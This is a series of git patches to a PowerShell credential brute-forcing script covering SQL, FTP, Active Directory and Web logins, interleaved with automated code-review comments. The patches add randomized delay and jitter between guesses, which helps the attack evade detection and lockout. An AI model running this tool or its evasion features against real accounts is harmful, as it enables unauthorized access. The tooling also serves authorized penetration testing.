From 98aae319528998ef997b901309ee02bd39d5ffea Mon Sep 17 00:00:00 2001
From: sammbertram
Date: Wed, 25 Nov 2015 13:39:13 +0000
Subject: [PATCH 1/5] Update Invoke-BruteForce.ps1

---
 Scan/Invoke-BruteForce.ps1 | 56 +++++++++++++++++++++++++++++++++-----
 1 file changed, 49 insertions(+), 7 deletions(-)

diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1
index 6334308..67d7901 100644
--- a/Scan/Invoke-BruteForce.ps1
+++ b/Scan/Invoke-BruteForce.ps1
@@ -1,4 +1,4 @@
-
+
 function Invoke-BruteForce
 {
 <#
@@ -23,6 +23,14 @@ Enter a Service from SQL, ActiveDirecotry, FTP and Web. Default service is set t
 .PARAMETER StopOnSuccess
 Use this switch to stop the brute forcing on the first success.
 
+.PARAMETER Delay
+Delay between brute-force attempts, defaults to 0.
+(Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
+
+.PARAMETER Jitter
+Jitter for the brute-force attempt delay, defaults to +/- 0.3
+(Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView)
+
 .EXAMPLE
 PS > Invoke-BruteForce -ComputerName SQLServ01 -UserList C:\test\users.txt -PasswordList C:\test\wordlist.txt -Service SQL -Verbose
 Brute force a SQL Server SQLServ01 for users listed in users.txt and passwords in wordlist.txt
@@ -50,27 +58,47 @@ Goude 2012, TreuSec [String] $ComputerName, - [Parameter(Position = 1, Mandatory = $false)] + [Parameter(Position = 1, Mandatory = $true)] + [Alias('Users')] [String] $UserList, - [Parameter(Position = 2, Mandatory = $false)] + [Parameter(Position = 2, Mandatory = $true)] + [Alias('Passwords')] [String] $PasswordList, - [Parameter(Position = 3, Mandatory = $false)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")] + [Parameter(Position = 3, Mandatory = $true)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")] [String] $Service = "SQL", [Parameter(Position = 4, Mandatory = $false)] [Switch] - $StopOnSuccess + $StopOnSuccess, + + [Parameter(Position = 5, Mandatory = $false)] + [Double] + $Jitter = .3, + + [Parameter(Position = 6, Mandatory = $false)] + [UInt32] + $Delay = 0 ) Process { - $usernames = Get-Content $UserList - $passwords = Get-Content $PasswordList + $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList + $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList + if (!$usernames) { + $usernames = $UserList + Write-Verbose "UserList file does not exist. Using UserList as usernames:" + Write-Verbose $usernames + } + if (!$passwords) { + $passwords = $PasswordList + Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:" + Write-Verbose $passwords + } #Brute force SQL Server $Connection = New-Object System.Data.SQLClient.SQLConnection function CheckForSQLSuccess @@ -100,6 +128,9 @@ Goude 2012, TreuSec Default { "Unknown" } } } + + # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView + Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay) } if($service -eq "SQL") { 
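Review bot: `$Service` is switched to `Mandatory = $true` in this hunk but keeps its `= "SQL"` default, and the two cannot both take effect — PowerShell prompts for a missing mandatory parameter rather than applying the default — while the help text visible in the previous hunk's context still says "Default service is set t…"; either keep `Mandatory = $false` or drop the default and update the help. The new file-or-literal fallback is decided by testing the result of `Get-Content -ErrorAction SilentlyContinue`, so a mistyped path or an empty wordlist file is silently treated as a single literal username or password; deciding on the path instead, `if (Test-Path -LiteralPath $UserList -PathType Leaf) { $usernames = Get-Content -LiteralPath $UserList } else { $usernames = $UserList }` (and the same for `$PasswordList`), makes the intent explicit and lets a genuine read error surface. The `Param(` block and the `Process` block both start outside the hunk.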
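Review bot: The comment-plus-`Start-Sleep` pair added at the end of this hunk is pasted verbatim into three more places in this patch (the hunks at `@@ -163`, `@@ -208` and `@@ -252`), one per service branch, so any later change has to be made four times and the branches can drift apart. A small helper declared next to `CheckForSQLSuccess` and called from each branch would keep it in one place; the `Start-Sleep` here also sits after the `CheckForSQLSuccess` function body, whose opening lines are outside the hunk, so where it lands in the control flow cannot be confirmed from the diff alone.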
@@ -163,6 +194,9 @@ Goude 2012, TreuSec
 $message = $error[0].ToString()
 $success = $false
 }
+
+ # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
+ Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 }
 }
 }
@@ -208,9 +242,15 @@ Goude 2012, TreuSec
 $success = $false
 $message = "Password doesn't match"
 }
+
+ # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
+ Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 }
 }
 }
+ else {
+ Write $message
+ }
 }
 #Brute Force Web
 elseif ($service -eq "Web")
@@ -252,6 +292,8 @@ Goude 2012, TreuSec
 $success = $false
 $message = "Password doesn't match"
 }
+ # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
+ Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 }
 }
 }

From 97718114c7f2eb28fded19430bcd6ca68fd1df29 Mon Sep 17 00:00:00 2001
From: sammbertram
Date: Wed, 25 Nov 2015 13:49:41 +0000
Subject: [PATCH 2/5] Update Invoke-BruteForce.ps1

---
 Scan/Invoke-BruteForce.ps1 | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1
index 67d7901..f3e5af9 100644
--- a/Scan/Invoke-BruteForce.ps1
+++ b/Scan/Invoke-BruteForce.ps1
@@ -77,7 +77,7 @@ Goude 2012, TreuSec
 $StopOnSuccess,
 
 [Parameter(Position = 5, Mandatory = $false)]
- [Double]
+ [Double]
 $Jitter = .3,
 
 [Parameter(Position = 6, Mandatory = $false)]
@@ -99,6 +99,9 @@ Goude 2012, TreuSec
 Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:"
 Write-Verbose $passwords
 }
+
+ $RandNo = New-Object System.Random
+
 #Brute force SQL Server
 $Connection = New-Object System.Data.SQLClient.SQLConnection
 function CheckForSQLSuccess

From 225bd0f133c0143ab88556a0885e31b2a0acdae9 Mon Sep 17 00:00:00 2001
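Review bot: The `else { Write $message }` added at the end of the `@@ -208,9 +242,15 @@` hunk sends a failure message to the success output stream (`Write` is an alias of `Write-Output`), so a caller that captures the function's output to collect the `Match found!` lines receives this text as if it were a result; `Write-Warning $message` keeps it out of the pipeline, and spelling the cmdlet out avoids the alias. The `if` this `else` pairs with starts outside the hunk, so which condition reaches it cannot be confirmed from the diff; `$message` appears to be assigned inside the Try/Catch of the loop above, so it may be unset or stale at this point if that loop did not run.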
From: sammbertram
Date: Wed, 25 Nov 2015 14:26:52 +0000
Subject: [PATCH 3/5] Update Invoke-BruteForce.ps1

---
 Scan/Invoke-BruteForce.ps1 | 37 +++++++++++++++++++------------------
 1 file changed, 19 insertions(+), 18 deletions(-)

diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1
index f3e5af9..e8d9049 100644
--- a/Scan/Invoke-BruteForce.ps1
+++ b/Scan/Invoke-BruteForce.ps1
@@ -75,9 +75,9 @@ Goude 2012, TreuSec
 [Parameter(Position = 4, Mandatory = $false)]
 [Switch]
 $StopOnSuccess,
-
+
 [Parameter(Position = 5, Mandatory = $false)]
- [Double]
+ [Double]
 $Jitter = .3,
 
 [Parameter(Position = 6, Mandatory = $false)]
@@ -89,16 +89,17 @@ Goude 2012, TreuSec
 {
 $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList
 $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList
- if (!$usernames) {
- $usernames = $UserList
- Write-Verbose "UserList file does not exist. Using UserList as usernames:"
- Write-Verbose $usernames
- }
- if (!$passwords) {
- $passwords = $PasswordList
- Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:"
- Write-Verbose $passwords
- }
+ echo $usernames
+ if (!$usernames) {
+ $usernames = $UserList
+ Write-Verbose "UserList file does not exist. Using UserList as usernames:"
+ Write-Verbose $usernames
+ }
+ if (!$passwords) {
+ $passwords = $PasswordList
+ Write-Verbose "PasswordList file does not exist. Using PasswordList as passwords:"
+ Write-Verbose $passwords
+ }
 
 $RandNo = New-Object System.Random
 
@@ -224,16 +225,16 @@ Goude 2012, TreuSec
 {
 :UsernameLoop foreach ($username in $usernames)
 {
- foreach ($Password in $Passwords)
+ foreach ($password in $passwords)
 {
 Try
 {
- Write-Verbose "Checking $userName : $password"
+ Write-Verbose "Checking $username : $password"
 $success = $principalContext.ValidateCredentials($username, $password)
 $message = "Password Match"
 if ($success -eq $true)
 {
- Write-Output "Match found! $username : $Password"
+ Write-Output "Match found! $username : $password"
 if ($StopOnSuccess)
 {
 break UsernameLoop
@@ -251,9 +252,9 @@ Goude 2012, TreuSec
 }
 }
 }
- else {
- Write $message
- }
+ else {
+ Write $message
+ }
 }
 #Brute Force Web
 elseif ($service -eq "Web")

From 5a115b29536c0e6eda0b845166a2a1fc79c94bac Mon Sep 17 00:00:00 2001
From: sammbertram
Date: Wed, 25 Nov 2015 14:27:18 +0000
Subject: [PATCH 4/5] Update Invoke-BruteForce.ps1

---
 Scan/Invoke-BruteForce.ps1 | 1 -
 1 file changed, 1 deletion(-)

diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1
index e8d9049..b8fc9a4 100644
--- a/Scan/Invoke-BruteForce.ps1
+++ b/Scan/Invoke-BruteForce.ps1
@@ -89,7 +89,6 @@ Goude 2012, TreuSec
 {
 $usernames = Get-Content -ErrorAction SilentlyContinue -Path $UserList
 $passwords = Get-Content -ErrorAction SilentlyContinue -Path $PasswordList
- echo $usernames
 if (!$usernames) {
 $usernames = $UserList
 Write-Verbose "UserList file does not exist. Using UserList as usernames:"

From daa5ae620c02822bd2a7c660bab22ff728f676e0 Mon Sep 17 00:00:00 2001
From: sammbertram
Date: Wed, 25 Nov 2015 14:33:14 +0000
Subject: [PATCH 5/5] Update Invoke-BruteForce.ps1

---
 Scan/Invoke-BruteForce.ps1 | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/Scan/Invoke-BruteForce.ps1 b/Scan/Invoke-BruteForce.ps1
index b8fc9a4..bd15ba3 100644
--- a/Scan/Invoke-BruteForce.ps1
+++ b/Scan/Invoke-BruteForce.ps1
@@ -226,9 +226,10 @@ Goude 2012, TreuSec
 {
 foreach ($password in $passwords)
 {
+ $SleepSeconds = $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
 Try
 {
- Write-Verbose "Checking $username : $password"
+ Write-Verbose "Checking $username : $password (then sleeping for $SleepSeconds seconds)"
 $success = $principalContext.ValidateCredentials($username, $password)
 $message = "Password Match"
 if ($success -eq $true)
@@ -247,7 +248,7 @@ Goude 2012, TreuSec
 }
 
 # Shamelessly stolen from https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
- Start-Sleep -Seconds $RandNo.Next((1-$Jitter)*$Delay, (1+$Jitter)*$Delay)
+ Start-Sleep -Seconds $SleepSeconds
 }
 }
 }
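Review bot: Only the ActiveDirectory branch now precomputes `$SleepSeconds` at the top of its password loop; the SQL, FTP and Web branches still evaluate `$RandNo.Next(...)` inline at their `Start-Sleep`, so the four branches have drifted apart and the new verbose text "(then sleeping for $SleepSeconds seconds)" is only true here. It is not always true even here: per the earlier hunk's context, a match with `-StopOnSuccess` leaves via `break UsernameLoop` before the `Start-Sleep` in the second hunk runs, so the message announces a sleep that does not happen. Either apply the same precomputation to the other three branches or move the sleep into one shared helper so message and behaviour cannot diverge; the enclosing foreach and function both start and end outside the hunk.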